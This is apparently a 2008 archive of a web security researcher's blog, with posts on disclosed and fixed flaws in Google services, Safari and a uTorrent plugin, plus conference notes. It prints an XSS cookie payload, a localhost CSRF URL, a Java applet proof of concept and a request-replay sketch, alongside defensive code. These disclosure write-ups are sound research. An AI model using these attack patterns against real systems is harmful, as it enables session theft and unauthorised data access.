Whose fault is this?  That’s the whole point of the post.  We have interaction between different software from different vendors.  In isolation, the behaviors that are being abused here are not a high risk.  It’s only when you combine the behaviors does it constitute a risk.  Who should we blame?  I don’t know, I don’t think anyone really knows… lots of people have their opinions though. :)

 

 

 

Thursday, June 19, 2008

BK on Safari, hunting Firefox...

Apple released a patch for their “Carpet Bomb” issue today.  I’m glad to see that Apple took steps to protect their users.  Kudos to the Apple Security team!   

 

There was a lot of discussion about how this behavior could be used in a “blended” attack with IE, but Safari’s behavior affected more than just IE. In fact, I discovered a way to use Safari’s carpet bomb in conjunction with Firefox to steal user files from the local file system.  Even though Apple has patched the carpet bomb, I’m not going to go into details, as the Firefox side of the issue is not yet patched and the behavior may be replicated via other means (it’s the kinder, gentler BK).  I’m also happy to say that some of the improved security features in Firefox 3 help lower (but do not eliminate) the impact of the issue (Firefox 2 users could still be at risk of arbitrary file pwnage). Mozilla is working on the issue and they’ve got a responsive team, so I’m sure we’ll see a fix soon. 

 

  • UNRELATED NOTE TO MOZILLA:  Firefox 3 shouldn’t FORCE itself to be my default browser after I install it (YES, I unchecked the default browser checkbox during install)


 

Now, these types of vulnerabilities are a perfect example of how all the software and systems we use are part of a giant ecosystem.  Whether we like it or not, the various parts of the ecosystem are intertwined with each other, depending on each other.  When one piece of the ecosystem gets out of line, it can have a dramatic effect on the ecosystem as a whole.  A small vulnerability, or even an “annoying” behavior, in one piece of software could alter the behavior of a 2nd piece of software, which a 3rd piece of software is depending on for a security decision (the recent pwn2own browser -> Java -> Flash pwnage is a great example of this).  As the ecosystem grows via plugins, functionality, and new software, so does the attack surface.  Eventually, the interactions between systems and software become a gigantic mesh and the attack surface becomes almost infinite.

 

Now, a lot of people have criticized Apple for their inability to see the carpet bombing behavior as a security issue.  If Apple looked at their product (Safari) in isolation, maybe it wasn’t a high-risk security issue to them and it was really more of an annoyance… it’s only when you look at the ecosystem as a whole that we start to see the security implications of this behavior.  Should we have expected Apple to threat model the risks of this behavior against their own products AND other third-party products as well?  Can we reasonably expect them (or anyone) to have the requisite knowledge to truly understand how certain behavior will affect the ecosystem? 

 

This brings us to a pressing question.  In the "real world", users install products from multiple vendors.  Whose responsibility is it to examine the interaction between all these products?

Saturday, June 14, 2008

3rd Annual Symposium on Information Assurance


I was recently given the honor of delivering a keynote talk for the 3rd Annual Symposium on Information Assurance, which was held in conjunction with the 11th Annual New York State Cyber Security Conference.  It was a great conference and I want to thank Sanjay Goel for inviting me!


 


The conference was VERY academic… which I love.  Academics present with an eye to the future, so I listened as PhD candidates talked about securing nano networks, sensor-based wifi networks, and a slew of other topics… Academics also seem to have a bold, fearless approach to the topics they present, which I admire…


 


While I enjoyed most of the talks I attended, there was one that perked the ears of the blackhat in me.  John Crain of ICANN gave a talk on “Securing the Internet Infrastructure: Myths and Truths”.  If you don’t know, ICANN basically owns the root DNS servers that the world relies on every day.  He gave a great explanation of how ICANN goes about creating a heterogeneous ecosystem of DNS servers.  These DNS servers use multiple versions and types of DNS software, multiple versions and types of operating systems, and even go so far as to use various pieces of hardware and processors.  The reasoning behind this logic is… if a vulnerability is discovered in a particular piece of software (or hardware), it would only affect a small part of the entire root DNS ecosystem, whose load could be transferred to another.  It’s an interesting approach indeed.  After the talk, someone asked me why enterprises/corporations don’t adopt a similar strategy.  I thought about it some, and I don’t think this approach could work in an enterprise environment… here’s why (other than the obvious costs and ungodly administration requirements):


 


ICANN’s interest is primarily in preventing hackers from modifying a 45K text file (yes, the root for the Internet is a ~45K text file).  Now, if a hacker happens to break into a root DNS server and modifies the file, ICANN can disable the hacked system, restore the file, and go about their business.  As long as ICANN has a “good” system up somewhere, they can push all their traffic to that system.  Businesses, on the other hand, aren’t primarily interested in preventing the modification of data (not yet at least); they are more interested in preventing the pilfering of data.  So if you own a network of a million different configurations, a vulnerability in any one of those configurations could allow an attacker to steal your data.  Once the hacker has stolen your data, what does it matter that the 999,999 other systems are unhacked?  



This brings up the heart of the argument, should we be worried about our systems being compromised or should we be worried about our data being stolen?  These are actually two different problems as I don’t necessarily have to compromise your system to steal your data…



Sunday, April 20, 2008

CSRF pwns your box?!?!

Before talking about an interesting set of CSRF vulnerabilities that were released this weekend, I wanted to take a few moments to do some "housekeeping" on the recent spreadsheets.google.com XSS.  (1) I gave the Google Security Team the details for this particular issue well before talking about it on my blog.  (2) The described issue was fixed by the GST before I even considered publicly speaking about the vuln.  (3) Part of the vulnerability involved a caching flaw in Google's servers; this issue is specific to Google and it was also fixed...   OK, on to the good stuff...
         
         
A few weeks ago, Rob Carter told me about a few interesting CSRF vulnerabilities that he discovered in a uTorrent plugin (he publicly disclosed them this weekend).  Rob was able to chain together the CSRF vulnerabilities, and the net result is complete compromise of the victim’s machine!  I think this may be the first PURE CSRF vulnerability that I've seen that resulted in compromise of a victim’s machine (there is an argument amongst some of my colleagues as to whether protocol handling/URI vulnerabilities are actually a form of CSRF, but that’s another story).  The series of vulnerabilities basically follows this flow:
         
When a user installs the uTorrent Web UI plugin, the plugin essentially starts a locally running web server on the user's machine (in order to serve the Web UI).  Rob targets the CSRF vulnerabilities associated with this locally running web server.

  • Rob uses the first CSRF to turn on the "Move completed downloads" option in the uTorrent Web UI.  The CSRF looks something like this:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1



  • Roughly speaking, a second CSRF against the same interface points the "completed downloads" directory at a location like the user's Startup folder.

  • A third CSRF then kicks off the download of an attacker-controlled file, which uTorrent happily "moves" into that directory once it completes.

Once the file is placed, the next time the user restarts their machine, the attacker-controlled file will be run...  there you have it... compromise of a victim’s system through three CSRFs!  Scary stuff... you can read more about the issue on Rob's blog.

ToorCon ROCKED!

ToorCon this weekend totally ROCKED.  Any venue that has flaming tetherball, major websites getting pwnd, hawt hacker chicks pwning backbone protocols, Java 0-days, and free beer has to ROCK.  All the talks I caught were awesome and the con has inspired me to look into some new avenues of research (aka pwnage). 

      

Thanks to H1kari, tim, Geo, and Phil for having me out!

Tuesday, April 15, 2008

Mark Dowd scares me....

If you haven't heard yet, Mark Dowd chopped up a Flash vulnerability ninja style and released a 25-page whitepaper describing his attack.  It's truly a work of art and can be found here.

    

I'm not even going to attempt to describe any portion of this attack (just thinking about it makes my head hurt), but Thomas Ptacek from Matasano has a great writeup.

Sunday, April 13, 2008

Google XSS

Now, normally when I find an XSS vulnerability on a popular domain I just report it to the appropriate security team and move on, but this one is interesting…



By taking advantage of the content-type returned by spreadsheets.google.com (and a caching flaw on the part of Google), I was able to pull off a full-blown XSS against the google.com domain. For those of you who don’t understand what this means, allow me to elaborate. When Google sets their cookie, it is valid for all of their sub domains. So, when you log into Gmail (mail.google.com), your Gmail cookie is actually valid for code.google.com, docs.google.com, spreadsheets.google.com… and so on. If someone (like me) finds an XSS vulnerability in any one of these sub domains, I’ll be able to hijack your session and access any Google service as if I were you.



So, in this instance, I have an XSS on spreadsheets.google.com. With this single XSS, I can read your Gmail, backdoor your source code (code.google.com), steal all your Google Docs, and basically do whatever I want on Google as if I were you! Google’s use of “document.domain=” also makes things a little easier when jumping from one domain to the next, but that’s another story…



This particular XSS takes advantage of how Internet Explorer determines the content type of the HTTP response being returned by the server. Most would think that explicitly setting the content-type to something that isn’t supposed to be rendered by the browser would easily solve this issue, but it does not. IE isn’t the only browser that will ignore the content-type header in certain circumstances; Firefox, Opera, and Safari will ignore it as well. Security professionals, and more importantly developers, need to understand the nuances of how the popular web browsers handle various content-type headers, otherwise they may put their web application at risk of XSS. The most comprehensive paper I’ve seen on the subject was written by Blake Frantz of Leviathan. The paper can be found here. It’s a “MUST HAVE” reference for web app security pros. Read it, understand it, protect yourself appropriately or expect others to exploit appropriately…



In this issue, Google set the content-type header to text/plain for a response whose content I controlled. If I can inject what looks like HTML into the first few bytes of the response, I’ll be able to “trick” Internet Explorer into rendering the content as HTML. Luckily for me, I was able to do just that.



I created a spreadsheet on spreadsheets.google.com and for the first cell (A1) I put the following content: “<HTML><body><script>alert(document.cookie)</script></body></HTML>”







I then saved the spreadsheet and generated a link for the spreadsheet to be served as a CSV.



CSV



When this option is selected, the contents of the spreadsheet are displayed inline (the content-disposition header was not explicitly set to “attachment”). IE ignores the content-type header, sniffs the content type from the response, then proceeds to render the response as if it were HTML. At this point, I control the entire HTML being rendered under an xxx.google.com domain.



XSS



To be fair, Google included a subtle defense to protect against content-type sniffing (padding the response), but those protection measures failed (with a little prodding by me). The issue is fixed, but if you try to reproduce it, you’ll see their defense in play. It’s a solid defense which shows they understand the nuances of content-type sniffing.



I’ll provide some tips on taking ownership of untrusted content and serving it from your server in a later post, but for now take a look at the paper written by Blake Frantz. I’m sure it will open some eyes…
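In the meantime, the short version of the fix is to stop the browser from ever rendering user-controlled responses inline. A sketch of the idea (this is my illustration, not Google's actual fix, using a hypothetical servlet and helper):

import java.io.IOException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class CsvExportServlet extends HttpServlet {
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        byte[] csv = loadUserSpreadsheetAsCsv(req); // hypothetical helper
        resp.setContentType("text/csv");
        // Force a download instead of inline rendering, so the browser never
        // gets a chance to sniff user-controlled bytes as HTML.
        resp.setHeader("Content-Disposition", "attachment; filename=\"export.csv\"");
        resp.getOutputStream().write(csv);
    }

    private byte[] loadUserSpreadsheetAsCsv(HttpServletRequest req) {
        return new byte[0]; // stub for the sketch
    }
}

Combine that with serving user-controlled files from a throw-away domain and you've removed most of the sting from content-type sniffing.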

RSA over... on to toorcon Seattle

McAfee Party

RSA is officially over!  It was a great experience and I'll talk about a few of the talks that really captured me in later posts.  I do want to thank Jeremiah Grossman for throwing the WASC get-together, the BAYSEC crew, McAfee (their party was awesome), iSEC (their party was AWESOME), Thirsty Bear, everyone at the W, and everyone that came to the Breaking and Securing Web Applications talk! 

      

There were tons of people trying to get answers to their web appsec questions after the talk.  If you weren't able to talk to me after the session or during the conference, please don't hesitate to shoot me an email. 

I'll be at ToorCon next week.  If you're in the Seattle area, look me up...

Thursday, April 3, 2008

Insecure Content Ownership

Taking ownership of someone else’s content is always a tricky deal.  Nate McFeters and I spoke about some of the issues related to taking “ownership” of someone else’s content last year at Defcon, but we continue to see more and more places willingly accepting third party content and happily serving it from their domain.  I came across an interesting cross domain issue based on content ownership that involved Google.  Google has fixed the issue, but I thought it was interesting, so I’ll share the details… but before I do… I wanted to mention the efforts put forth by the Google Security Team (GST).  Fixing this issue was not trivial… it involved significant changes to how content was served from Google’s servers.  Needless to say, the GST moved quickly and the issue was fixed in an amazingly expedient and effective manner… KUDOS to the GST!

    

On to the issue:
I discovered that users could upload arbitrary files to the code.google.com domain by attaching a file to the "issues" portion of a project.  The uploaded file is then served from the code.google.com domain.  Normally, these types of attacks would make use of the Flash cross domain policy file and the System.security.loadPolicyFile() API.  However, due to the unique path of each project, the cross domain capabilities of Flash are very limited in this instance, as policy files loaded via loadPolicyFile() are “limited to locations at or below its own level in the server's hierarchy”. 

    

Address Bar

     
Flash isn't the only option here though.  Java has a different security policy and uploading a Java class file to the code.google.com domain gives me access to the entire domain, as opposed to only certain folders and sub folders. 

    

Sounds pretty straightforward, huh?  Well, I ran into some issues, as the JVM encodes certain characters in its requests for class files made via the CODE attribute within APPLET tags.  After poking around a bit, I realized that requests made via the ARCHIVE attribute would be sent as-is, without the encoding of special characters.  With this newfound knowledge in hand, I created a JAR file with my class file within it and uploaded it to code.google.com.

      

Issues Upload

    

Now, the CODE attribute is a required attribute within the APPLET tag, so I specified the name of the class file I placed within the JAR file.  When the APPLET tag is rendered, the JVM first downloads the JAR file specified in the ARCHIVE attribute, then makes the request for the class file specified in the CODE attribute.  In this instance, the request for the class file specified in the CODE attribute will fail, as the class file is not on the code.google.com server (even if it was, we wouldn’t be able to reach it, as requests made via the CODE attribute are encoded).  The failure to locate the class file causes the JVM to begin searching alternate locations for the requested class file, and the JVM will eventually load a class file with the same name located inside of the JAR file...

    

Applet Code  



    

Once the class file is loaded, the JVM fires the init() method, and Java's Same Origin Policy allows me to use the applet to communicate with the domain that served the applet class file (as opposed to the domain hosting the HTML that calls the APPLET tag).  Here’s a screenshot of the PoC page I was hosting on XS-Sniper.com.

     

Proof of Concept
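For those who want to see the moving parts, here's a minimal sketch of what the applet side of a PoC like this might look like.  The class name, project path, and target URL below are all hypothetical (I'm not reproducing the real attachment paths), but the embedding tag and the connect-back behavior are exactly the pieces described above:

//  The attacking page (hosted anywhere) would embed the applet roughly
//  like this -- project path and file names are hypothetical:
//
//    <applet code="PocApplet.class"
//            codebase="http://code.google.com/p/some-project/issues/"
//            archive="attachment.jar" width="1" height="1"></applet>
//
//  The JVM's (encoded) request for PocApplet.class on the server fails,
//  so it falls back to the JAR named in ARCHIVE and loads the class from
//  inside it.

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class PocApplet extends Applet {
    public void init() {
        try {
            // Java's Same Origin Policy keys off the domain that served the
            // class file (code.google.com), NOT the page embedding the applet,
            // and HttpURLConnection rides on the browser's cookies.
            URL url = new URL("http://code.google.com/some/page"); // hypothetical target
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            BufferedReader in = new BufferedReader(
                    new InputStreamReader(conn.getInputStream()));
            StringBuilder page = new StringBuilder();
            String line;
            while ((line = in.readLine()) != null) {
                page.append(line).append('\n');
            }
            in.close();
            // A real PoC would relay the response back to the attacking page.
            System.out.println(page);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}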

    
I don’t think there is a tool on the market today that even attempts to detect something like this, and I’ve met many “security professionals” who have no idea that vulnerabilities like this even exist.  This isn’t the first time I’ve come across a cross domain hole based on content ownership.  I’m expecting we’ll see a lot more of these types of vulnerabilities in the future as cross domain capabilities become more prevalent in client side technologies and as content providers become more and more comfortable taking ownership of others’ content.

Wednesday, April 2, 2008

Amsterdam, RSA, Security Vids, and the Harvard Business Review

I've survived yet another Blackhat Europe... actually, part of me probably perished in the streets of Amsterdam, but that's a story for the bars.  I'll be in San Francisco next week speaking at the RSA Conference.  I plan on attending the WASC RSA meetup and the iSEC Forum and Social (I love the iSEC parties!).  If you see me out and about, hit me up and we'll talk security over a few drinks!

    

Also, a co-worker sent me a link to a collection of secure development videos.  The videos cover a wide range of topics, from "How Do I: Prevent a SQL Injection Security Flaw in an ASP.NET Application" all the way to "How Do I: Use Managed Cards in Windows CardSpace to Increase the Security of My Web Site".  The videos are a great place for any budding developer to explore some Secure Development techniques.  I like the videos because many of them address security-related questions that I get all of the time, and they serve as an excellent remediation tool.  The vids are by no means a comprehensive guide to Secure Development, nor are they a replacement for a formal SDL, but they can be a great training tool and have a lot of value.

       

Last item for the day...  I'm a big fan of the Harvard Business Review (HBR).  Usually, the articles contained within HBR have nothing to do with information security (or even computers, for that matter).  In the latest issue, there is a piece entitled "Radically Simple IT", which outlines some interesting strategies for IT projects at the enterprise level (a "path-based" approach).  It's an interesting article, and if you're considering implementing any medium- to large-sized IT project, you should definitely give it a read....

Wednesday, March 26, 2008

Have some Bad Sushi at Blackhat Europe

I'll be headed out to Blackhat Europe, speaking on phishing, scams, and ATM skimmers.  If you're in the area, look me up and we'll grab a few at the bar.



Also, I wanted to take a moment to thank my colleagues out in Hyderabad, India. I recently traveled to Hyderabad for some security work and the hospitality and friendliness I encountered really made me feel at home!

Wednesday, March 19, 2008

Preventing XSS Exploitation with CSRF Tokens?!?!

A colleague and I were tossing around the idea of preventing XSS Exploitation with CSRF tokens. Now, before people start going "high and right" on me...hear me out... I DID NOT say "prevent XSS" with CSRF tokens, I said prevent "XSS Exploitation" with CSRF tokens. This discussion arose after someone presented me with the following scenario (this same scenario has been presented to me many, many times... typically at a bar after a few drinks):



You come into an organization and take over the application security department because the old security person left/was fired/was arrested/whatever.  You take a look at the 10-million-line flagship application and realize that it's riddled with XSS holes, yet you don't have the resources/time/cojones to fix all the exposures.  What do you do?


This scenario is usually followed up by a pitch to sell me on some Web Application Firewall product.....  I'll put my thoughts on WAFs aside for a second and try to get to the underlying issue of the scenario presented above: you need to do something to stop your customers from getting XSS'd, you don't have much time, you don't have many resources, and there is a ton of code to go through.

Now, what if you required CSRF tokens/canaries for every request?  This doesn't "fix" the XSS exposures, but it makes them a LOT more difficult to exploit (unless you want to exploit yourself).  The CSRF tokens effectively prevent an attacker from sending the XSS to anyone else.  Considering many token/canary values are implemented at the framework level, in most cases this would require only a configuration change for the application.  Now, once every page is protected by the canary, you can systematically examine the "high priority" pages or pages where canaries don't make sense and remove the canary requirement after that particular page/functionality has gone through a review.  In order to prevent the attacker from sending their own canary value, the CSRF token would have to be tied to the current user's session (most good implementations do this anyway).  A rough sketch of what such a check might look like is below.
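Here's a minimal sketch of the idea as a Java servlet filter.  The parameter and attribute names are placeholders, and in practice you'd enable this at the framework level rather than hand-roll it:

import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class CanaryFilter implements Filter {

    public void init(FilterConfig config) { }

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        // The canary is generated at login and stored in the session, so an
        // attacker can't simply supply a token of their own in a crafted link.
        HttpSession session = request.getSession(false);
        String expected = (session == null) ? null : (String) session.getAttribute("canary");
        String supplied = request.getParameter("canary");

        if (expected == null || !expected.equals(supplied)) {
            // No valid canary, no request.  The XSS hole is still there,
            // but an attacker can't deliver it to anyone else.
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
            return;
        }

        chain.doFilter(req, res);
    }

    public void destroy() { }
}

Pages where the canary doesn't make sense would simply be excluded from the filter mapping and sent through review, as described above.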

Now, once again, this DOES NOT FIX XSS, it just makes exploitation harder.  This isn't a new concept; in fact, this same type of approach is being used by modern day operating systems.  Take buffer overflows, for example: protections like DEP, ASLR, StackGuard, and the GS flag do not prevent developers from writing buffer overflows and they do not "fix" buffer overflows... they do make exploiting buffer overflows a lot more difficult (unless you're a Litchfield brother, HD Moore, or Alexander Sotirov).

Now, of course there are some cons to this strategy...  First, the XSS exposures are not fixed (the WAFs don't fix them either).  This doesn't protect against persistent XSS.  There will be some performance hit on your web server when you require canaries for each request.  This will NOT help you defend against injection attacks like SQL Injection or Command Injection; those will require an audit... on the flip side... if you're relying solely on a WAF to protect you against SQLi and Command Injection, I'd be worried...

Monday, March 17, 2008

Reflections on Trusting Trust

For those who have never read the classic "Reflections on Trusting Trust", you can find it here.  Reflections is an easy read on the perils of running un-trusted code on your machine.  It's a concept that's foreign to many users, as we typically run "un-trusted" HTML and client-side scripts from web sites thousands of times a day, praying that the browser sandbox and same origin policy save us...  I mean... can you really trust the underlying content from this blog?

   

Of course, downloading and running code on your machine is EVEN MORE DANGEROUS.  It doesn't matter what kind of browser protections you have; once you execute code from an untrusted source, you're at the mercy of that developer.  Do you really trust the publishers of all those plugins and add-ons you are running?  A perfect example of this... is G-Archiver.  G-Archiver is a program that can be used to back up your Gmail messages to an offline source.  Apparently, after some tinkering with .NET Reflector (great tool, btw), Dustin Brooks discovered a HARD CODED Gmail username and password in the source.  Upon further investigation, Dustin realized that users of G-Archiver were silently having their Gmail creds posted to a Gmail account belonging to the creator of the G-Archiver tool (John Terry).  Here's a screen shot of what Dustin saw:

   

G-Archiver Hard-Coded Credentials



     

Luckily, I've been conditioned (mostly by the pranksters at the Advanced Security Center in Houston) not to trust anything...

   


Wednesday, March 5, 2008

IE 8 Beta is Out!

The IE8 Beta is out.  You can grab beta 1 here.  I'm not going to comment on my thoughts on IE8 as I'm biased, but I've been playing around with some of the features and it's actually pretty cool.  

    

Probably the most interesting/most talked-about features are WebSlices and Activities.  They're a little difficult to explain, but I think the video here does a pretty good job.

    

Happy Hunting!

Sunday, February 24, 2008

Hanging with the Feds in DC

Blackhat Federal in Washington DC is officially over!  It was a great time and I'm honored to have been chosen to speak at the event.  Nitesh and I received a lot of great feedback and our talk was mentioned in a few different places (here, here and here).  Nitesh and I realize that the slides by themselves are virtually impossible to understand, so if you're interested in hearing the full talk, please don't hesitate to contact us.


The talks I attended were all great, but below is a quick blurb on my favorites:




Cracking GSM - I've been waiting months for this talk.  h1kari and Steve from THC gave an incredible overview of how they are able to crack the A5 encryption used by cell phones to protect GSM voice and SMS communications.  They also pointed out several security weaknesses associated with cell phones and cell phone transmissions (strongest-signal seeking, JVMs on SIM cards, downgrade attacks, lack of notification when weak/no encryption is being used...).  h1kari and Steve are using FPGAs to generate a 2 TERABYTE rainbow table and use FPGAs to crack the encrypted data.  With the help of a SINGLE FPGA (and the rainbow table) you can crack encrypted GSM communications in about 30 mins (30 mins as in, you capture and store the traffic as it goes by and crack it offline in 30 mins).  Commercial grade equipment that is being developed will be able to do it in 30 seconds!  This is the third FPGA-based project that has raised my eyebrows over the last year (this, NSA@home, and a third project that will remain undisclosed at this time).  Expect to see high amounts of processing power used to crack/brute-force/solve previously un-crackable, un-bruteforceable, and unsolvable problems...  we live in exciting times, my friends.




IO in the Cyber Domain, Immunity Style - Sinan from Immunity gave an awesome talk on Information Operations (IO) and how IO differs from penetration testing.  This is a discussion that I've had with many colleagues over many beers.  The basic gist of the discussion is, "how do you defend an organization/individual against sustained, targeted attacks over an extended period of time?"  Immunity was basically given unlimited time and budget to break into an organization... it's a scenario very closely aligned with state-sponsored Computer Network Exploitation (CNE), Computer Network Attack (CNA), and Computer Network Defense (CND) scenarios, where the adversary can conduct sustained information gathering and targeted attacks against an organization over an extended period of time.  Immunity spiced it up by bringing into play a "few 0-dayz" and described how they penetrated the organization's defenses in a methodical, well-planned, and well-organized manner.  IO is a topic that's near and dear to my heart, and I thought the scenarios presented in the talk were indicative of what some organizations face every day...


URI Use and Abuse / DTrace: The RE's Unexpected Swiss Army Knife - I put these two talks together because Nate, Rob, Tiller, and David really brought out one of the core reasons why I like security conferences... we met the day before the conference at the hotel bar, talked about a few interesting things, and then proceeded to take a vulnerability from "un-exploitable" (as reported to us by the vendor) to "exploitable".  Not to worry, the vendor has already been notified about the vulnerability...

Sunday, January 27, 2008

Bad Sushi: Beating Phishers at their own Game

A colleague (Nitesh Dhanjani) and I were recently accepted to speak at Black Hat Federal in Washington DC.  What basically started as a few laughs over a phishing site eventually turned into months of serious investigation into the entire ecosystem that supports the phishing effort.

   
Nitesh and I basically infiltrated a few phishing forums, tracking a phisher from compromised webservers, to phishing forums, to carderz sites.  We managed to get a hold of about 100 different phishing kits, various tools used by phishers, and gained some insight as to how phishers do their business.  I was STAGGERED by the amount of PII (full names, DOBs, credit card numbers, SSNs, addresses, phone numbers…) that is placed on public web servers by phishers, hidden only by obscurity.  Once this obscurity is broken, even a simple query in a search engine will reveal a significant amount of stolen identity related information including names, credit card numbers, SSN, DOBs…

   
I was also FLOORED by the number of phishing and credit card fraud related forums.

     

Carderz Forums

   

Nitesh and I basically stopped our research because the number of sites and the staggering amount of exposed PII was simply too much.  There literally is an entire ecosystem devoted to supporting the phishing effort that plagues modern-day financial institutions, one that simply cannot be fully explored by two security researchers alone.  If you’re in the DC area, stop by Black Hat and we’ll show you some of the things we saw.  We gave a brief description of some of our findings in an interview for Help Net Security.  For those of you who are curious, due to the ENORMOUS amount of PII we came across, we’ve contacted the FBI and we’ll be sharing some things with them that WILL NOT be in the talk or any interviews!

Monday, January 7, 2008

There's an OAK TREE in my blog!?!?!

A while back I came across another interesting issue that allowed me to steal an arbitrary Google Doc (assuming I knew the DocID). This issue has already been fixed by Google, but the details are pretty interesting so I thought I would share! Now, before I get into the gory details, I'd like to mention two things about Google:

     


  1. I know some people have had issues with Google's Security Team (GST), but I've always had pleasant experiences with them.  GST moves with LIGHTNING speed and they are usually great about keeping me apprised of the status of various issues I've reported to them.

  2. In addition to fixing this particular exposure, GST has also increased the entropy of the DocID, making sploits based on DocID guessing totally impractical.  It's a great example of going the extra step to help protect users...

 


Now... the gory details...  First, I went to Wordpress.com and created a new blog (there were other ways to pull this off, but this was the easiest way).  Once the blog was created, I logged into Google Docs with my account, created a document, and selected the "publish this document" option.  Once in the "publish" menu, I selected the "Blog Site Settings" option.  This option basically allows a Google Docs user to create a document in Google Docs and POST it directly to their blog!  I entered my blog provider, blog username, and blog password into the blog settings page.  The page is shown below:

 



My Blog Settings

 



Once my blog settings were properly entered, I selected the "Publish This Document To Your Blog" option. The POST request made by my browser looked something like this:

 


POST /MiscCommands HTTP/1.1
<HTTP HEADERS>

command=cmdvalue&localDate=datevalue&docID=doc-id-here&finis=finisvalue&POST_TOKEN=posttokenvalue

 


When this feature is selected, it appears that the Google Docs server makes a request to the xmlrpc.php file on the blog server (Wordpress.com), passing the credentials I supplied in the blog settings.  When the blog server indicates that the blog creds are valid, the Google Docs server sends the contents of the Google Doc to the blog server.  Hmmmm... that docID value looks reeeallly interesting...  I changed the docID in the POST request from the docID of my newly created document to the docID of the "Article For Oak Tree View" (the document used by Google to demo Google Docs).
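To make the replay concrete, here's roughly what resending that request with a swapped docID might look like.  This is a sketch only: the host is an assumption, and the parameter values are the placeholders carried over from the captured request above (in practice, I simply replayed my browser's own request with one field changed):

import java.io.OutputStreamWriter;
import java.net.HttpURLConnection;
import java.net.URL;

public class DocIdReplay {
    public static void main(String[] args) throws Exception {
        // Host and parameter values are placeholders from the captured
        // request above; only the docID changes between the legitimate
        // publish request and the attack.
        URL url = new URL("https://docs.google.com/MiscCommands"); // assumed host
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("POST");
        conn.setDoOutput(true);
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        conn.setRequestProperty("Cookie", "<my own Google Docs session cookies>");

        String body = "command=cmdvalue&localDate=datevalue"
                + "&docID=<someone else's docID>"   // the only field that changes
                + "&finis=finisvalue&POST_TOKEN=posttokenvalue";

        OutputStreamWriter out = new OutputStreamWriter(conn.getOutputStream());
        out.write(body);
        out.close();

        System.out.println("HTTP " + conn.getResponseCode());
    }
}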

 



OAKTREE-DocID

 



After changing the docID and sending the POST request, I logged into my Wordpress Blog and LO AND BEHOLD... my first blog POST was the Oak Tree Newsletter!

 



Oak Tree in My Blog

 



I tried it on some friends' documents with the same result and then contacted the GST....

 



Links to other Google Docs Stuff here, here, and here

Wednesday, January 2, 2008

Straight from the Source!

I hope everyone had a great New Year!  I had a sweet New Year… Liddell laid a serious smack down, I spent a few days boarding the slopes of Mt Baker, and I came across a sweet new blog from Secure Windows Initiative (SWI) at Microsoft.
   
Damian Hasse, Jonathan Ness, and Greg Wroblewski from SWI are going to give technical analyses of vulnerabilities being fixed by the patches released on “Patch Tuesday”.  Taking a look at the analysis and the level of detail they go into, I must say… I’m impressed.  One of the examples discussed by the guys from SWI (MS07-063) shows the differences between pre-patch and post-patch SMB packets and even includes a pcap file of pre-patch SMB packets.

I think initiatives like this are awesome.  Bad guys are going to figure this stuff out via reverse engineering, so why not help the good guys understand what they are patching as well?  Providing technical information about vulnerabilities can help a good security team better understand and mitigate the business risks associated with them.  I can even see some resourceful professor using the analyses provided by SWI as case studies for prospective security pros.  Check it out sometime!  Great job, guys!